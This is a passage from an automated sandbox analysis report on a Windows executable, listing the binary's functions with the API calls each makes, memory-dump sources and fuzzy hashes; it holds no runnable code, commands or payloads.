                    • VariantClear.OLEAUT32(?), ref: 00CC723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00CC7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CC7252
                    • VariantClear.OLEAUT32(?), ref: 00CC7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CC726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: d5e08c9bcebd44ffe18f81fbca3013156b71c3e310b4c79608293bd9c9149f7a
                    • Instruction ID: bb885852005339608b90d92d09c4431fc97e6332344e01723218d59dc5cca29c
                    • Opcode Fuzzy Hash: d5e08c9bcebd44ffe18f81fbca3013156b71c3e310b4c79608293bd9c9149f7a
                    • Instruction Fuzzy Hash: 93414D35A00219EFCB00DF64D848FAEBBB8EF48354F008169F955A7261CB30AA46DF91
                    Function 00CE5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WS2_32(00000101,?), ref: 00CE5AA6
                    • inet_addr.WS2_32(?), ref: 00CE5AEB
                    • gethostbyname.WS2_32(?), ref: 00CE5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 00CE5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CE5C00
                    • WSACleanup.WS2_32 ref: 00CE5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: f85f7ed8b66726c8530b4693f83a9efa49469d768dffdd39f6ecc5267002d5e7
                    • Instruction ID: 15e3ab76c59f8de32034e154ddc720120db6a13882ae1310b8e697bd061c56d4
                    • Opcode Fuzzy Hash: f85f7ed8b66726c8530b4693f83a9efa49469d768dffdd39f6ecc5267002d5e7
                    • Instruction Fuzzy Hash: FD51A3316047009FDB11EF26CC45B2EBBE4EF48714F14892AF55ADB2A1DB70E940DB56
                    Function 00CDB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00CDB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CDB7B1
                    • GetLastError.KERNEL32 ref: 00CDB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00CDB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 09d67f7efec79ea09e7260eb3bec2ccbfd08c1f7018decf3647c5791e3f356a5
                    • Instruction ID: 22de8d924451bf98b641f352ffaeea546ce7d5e57c1ee4023ad772c1b3de02ba
                    • Opcode Fuzzy Hash: 09d67f7efec79ea09e7260eb3bec2ccbfd08c1f7018decf3647c5791e3f356a5
                    • Instruction Fuzzy Hash: 2131A235A00209DFDB10EF68D885ABEB7B4EF84700F12802AE616D7391DB719E46D761
                    Function 00CC9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CC94F6
                    • GetDlgCtrlID.USER32 ref: 00CC9501
                    • GetParent.USER32 ref: 00CC951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CC9520
                    • GetDlgCtrlID.USER32(?), ref: 00CC9529
                    • GetParent.USER32(?), ref: 00CC9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CC9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 079c8843cc0947262770f86c57a936eddd20665befbe0d9ba4afd6020d73b339
                    • Instruction ID: 13d8b185c2da8ddaa27cd8e252d4c9aa5edbc45e93b0b1b1d839189e19c2c9b5
                    • Opcode Fuzzy Hash: 079c8843cc0947262770f86c57a936eddd20665befbe0d9ba4afd6020d73b339
                    • Instruction Fuzzy Hash: A221B270E00108ABCF05ABA4CC85FFEBB74EF45310F104229F561972E1DB755919EB21
                    Function 00CC955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CC95DF
                    • GetDlgCtrlID.USER32 ref: 00CC95EA
                    • GetParent.USER32 ref: 00CC9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CC9609
                    • GetDlgCtrlID.USER32(?), ref: 00CC9612
                    • GetParent.USER32(?), ref: 00CC962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CC9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: cfb41f7faa44682efc42a69d0c08c65f78e1ef6171c68c517bb1a3b69876840b
                    • Instruction ID: eae6088a4e63570c7c136bf5c9b87d875ab656aa1d86dd484085533e79195ca4
                    • Opcode Fuzzy Hash: cfb41f7faa44682efc42a69d0c08c65f78e1ef6171c68c517bb1a3b69876840b
                    • Instruction Fuzzy Hash: CE217175A00208BBDF05ABA0CC95FFEBB78EF58300F104159F961972E1DB759919EB21
                    Function 00CC9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32 ref: 00CC9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00CC9666
                    • _wcscmp.LIBCMT ref: 00CC9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CC96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: 5e66977591041c3dab197aaec66e49b9e56461707029e72b66bb97b30796a9c1
                    • Instruction ID: 3ee76afa0ca84637266ec45e731780132dfd178ba1be44a43da7e6bff9765aca
                    • Opcode Fuzzy Hash: 5e66977591041c3dab197aaec66e49b9e56461707029e72b66bb97b30796a9c1
                    • Instruction Fuzzy Hash: 5A113A76248357BAFA012621EC1FFAAB79CDF11324F20002EF910A44E1FF715A419568
                    Function 00CD4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                    • __swprintf.LIBCMT ref: 00CD419D
                    • __swprintf.LIBCMT ref: 00CD41AA
                      • Part of subcall function 00C938D8: __woutput_l.LIBCMT ref: 00C93931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CD41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 00CD41E0
                    • LockResource.KERNEL32(00000000), ref: 00CD41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00CD420D
                    • LoadResource.KERNEL32(?,00000000), ref: 00CD421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 00CD422E
                    • LockResource.KERNEL32(?), ref: 00CD423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CD429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 1fa3e48491dae30e6f95654936b5fbc45a7b6e41c1d715a16f2d544185618884
                    • Instruction ID: 67ea1bd54020e433a859a57cfba01035c41364cbfae978be7ac924a201c8e0ff
                    • Opcode Fuzzy Hash: 1fa3e48491dae30e6f95654936b5fbc45a7b6e41c1d715a16f2d544185618884
                    • Instruction Fuzzy Hash: 5E31AEB160121AABDB199F60DC88BBF7BACEF04301F00452AFA11D2250D770DA52CBB1
                    Function 00CD16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00CD1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 00CD171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00CD0778,?,00000001), ref: 00CD17CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: e3e1ec2ff99f1cae3cd45163ccd88d39583b0e795d00658be4c64c62b3de35a4
                    • Instruction ID: 3855d81e7e7712b59db0a2105b0dbd5f509871acb58f2b19e745761c9e4b5280
                    • Opcode Fuzzy Hash: e3e1ec2ff99f1cae3cd45163ccd88d39583b0e795d00658be4c64c62b3de35a4
                    • Instruction Fuzzy Hash: A8317CB5604704BBEB219F14DC84B7D7BAAEF55711F16402AFE14CA3A0DB749E80CB61
                    Function 00C7FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                    Download Yara Rule
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C7FC06
                    • OleUninitialize.OLE32(?,00000000), ref: 00C7FCA5
                    • UnregisterHotKey.USER32(?), ref: 00C7FDFC
                    • DestroyWindow.USER32(?), ref: 00CB4A00
                    • FreeLibrary.KERNEL32(?), ref: 00CB4A65
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CB4A92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: 9574ed7cae849eb7de63b0ba5d3376007d5a5cb56018016c332c3982ffa225ff
                    • Instruction ID: 4992f3c49249b79e48d7f825349331cc7d977701745f4ed9f40df0ec486f6207
                    • Opcode Fuzzy Hash: 9574ed7cae849eb7de63b0ba5d3376007d5a5cb56018016c332c3982ffa225ff
                    • Instruction Fuzzy Hash: A7A15A30705212CFCB29EF14C495B69F7A4EF04710F1482ADE91AAB262DB30AE17EF54
                    Function 00CCA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                    Download Yara Rule
                    APIs
                    • EnumChildWindows.USER32(?,00CCAA64), ref: 00CCA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: dce46eae059f295eae4cc06926186a3eb7c56246fee615f3edd8a3e0b7a38580
                    • Instruction ID: db0599008063632eaf375155b753864bc2862f7c4f7a0af76ccd0ab465f5bd47
                    • Opcode Fuzzy Hash: dce46eae059f295eae4cc06926186a3eb7c56246fee615f3edd8a3e0b7a38580
                    • Instruction Fuzzy Hash: 2B918631A0054A9BDF18DF60C48AFE9FB74BF04318F50811DD59AA7251DF306A99DBA1
                    Function 00C72E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00C72EAE
                      • Part of subcall function 00C71DB3: GetClientRect.USER32(?,?), ref: 00C71DDC
                      • Part of subcall function 00C71DB3: GetWindowRect.USER32(?,?), ref: 00C71E1D
                      • Part of subcall function 00C71DB3: ScreenToClient.USER32(?,?), ref: 00C71E45
                    • GetDC.USER32 ref: 00CACF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CACF95
                    • SelectObject.GDI32(00000000,00000000), ref: 00CACFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 00CACFB8
                    • ReleaseDC.USER32(?,00000000), ref: 00CACFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CAD04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 725bc68f471bec3fc4aa9891bef438ae0688b1f0b1323ad66bf161ca2144aed7
                    • Instruction ID: c51bbcf62764dc93ab8f082ffbe708217a8b2690da509a7830496d576c2bb419
                    • Opcode Fuzzy Hash: 725bc68f471bec3fc4aa9891bef438ae0688b1f0b1323ad66bf161ca2144aed7
                    • Instruction Fuzzy Hash: DD71B730500206EFCF21CF64CC84ABA7BB5FF4A355F148269FD669A2A5C7318D51DB61
                    Function 00CEF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CEF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CEFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CEFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CEFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CEFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CEFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CEFD90
                    • CloseHandle.KERNEL32(?), ref: 00CEFDBF
                    • CloseHandle.KERNEL32(?), ref: 00CEFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: fcb0385e960666f61f1dab87dc75855af886afb2825829fc67e1c4eb4fc4a867
                    • Instruction ID: e348055bda2fe0de1b60a2bd9372cc69a724cf596dc34078b86110e120ab32ba
                    • Opcode Fuzzy Hash: fcb0385e960666f61f1dab87dc75855af886afb2825829fc67e1c4eb4fc4a867
                    • Instruction Fuzzy Hash: C1E1C2312043819FCB24EF25C891B6ABBE1EF84314F14856DF8998B3A2DB31DD46DB52
                    Function 00C7201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C72036,?,00000000,?,?,?,?,00C716CB,00000000,?), ref: 00C71B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C720D3
                    • KillTimer.USER32(-00000001,?,?,?,?,00C716CB,00000000,?,?,00C71AE2,?,?), ref: 00C7216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00CABEF6
                    • DeleteObject.GDI32(00000000), ref: 00CABF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 2402799130-0
                    • Opcode ID: 5ed08c0072e7aec661c38b52b38abda66b975609ed995aa0b4a70d775edc6ff9
                    • Instruction ID: afa45d3e92fcf2bfe636b22027ae4c035f00ff75cd616b36b3b5753906010831
                    • Opcode Fuzzy Hash: 5ed08c0072e7aec661c38b52b38abda66b975609ed995aa0b4a70d775edc6ff9
                    • Instruction Fuzzy Hash: B6619534100701EFCB259F15CD48B2AB7B1FF4531AF54C429E45A86AA1C771AD91EFA1
                    Function 00CD4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CD48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD38D3,?), ref: 00CD48C7
                      • Part of subcall function 00CD48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CD38D3,?), ref: 00CD48E0
                      • Part of subcall function 00CD4CD3: GetFileAttributesW.KERNEL32(?,00CD3947), ref: 00CD4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 00CD4FE2
                    • _wcscmp.LIBCMT ref: 00CD4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 00CD5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
